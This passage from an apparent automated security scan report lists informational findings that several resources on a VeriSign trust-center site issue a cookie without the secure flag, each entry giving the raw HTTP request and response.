Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46
...[SNIP]...

6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0.
...[SNIP]...

6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;

6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................        

       ..................C.......    ..    
   
.......................................................'...................................
...[SNIP]...

6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................            


............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................            


............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................        

       .....................(...............................    ...2......................U..........!"6AGu....123q.........?..Y...x.zWG
...[SNIP]...

6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r    .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f.
...[SNIP]...

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
